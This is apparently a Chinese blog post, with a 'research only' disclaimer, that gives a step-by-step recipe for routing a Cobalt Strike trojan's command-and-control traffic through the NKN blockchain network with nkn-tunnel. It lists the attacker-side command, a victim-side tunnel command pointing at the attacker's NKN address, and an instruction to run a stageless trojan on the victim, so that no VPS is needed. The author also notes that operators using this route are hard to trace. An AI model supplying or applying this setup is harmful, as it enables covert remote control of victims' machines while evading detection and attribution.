当了回标题党(下次还敢),大佬们轻点打。仅供研究,不得用于任何非法目的

上线流程

起初是看到了NGLite这个远控工具,了解到NKN区块链网络。发现官方不但提供多语言SDK,连TCP隧道成品nkn-tunnel都给了,果断嫖来搞歪门邪道。

  1. 在本地正常流程启动CS,客户端连接本地服务器,按端口流量转发的套路新建监听器

  1. 以下图CS4.4为例,木马之后会连接开在受害者本地p2p代理入口的8081端口,172.16.1.1:443为CS监听的本地内网地址与端口

  1. 下载Releases中对应平台的成品,或者自行编译。本地执行nkn-tunnel -from nkn -to 127.0.0.1:443 -v,表示将NKN网络接收到的流量转发到本地443端口。此时会显示Listening at xxx,xxx是随机生成的64个十六进制数(secret seed)

  2. 在受害者机器上执行nkn-tunnel -from 127.0.0.1:8081 to xxx,表示将受害者本地8081端口接收到的流量转发进NKN网络

  3. 生成CS的stageless木马,在受害者机器上执行,免VPS上线

看客户案例国内移动和爱奇艺也在用这个网络,目前响应速度挺不错的,但是节点好像不多,抓人应该也不太难哈哈哈。后续可以与远控木马集成为单个二进制文件,也可以作为流量穿透方式的补充,或者被大家玩烂胎死腹中:(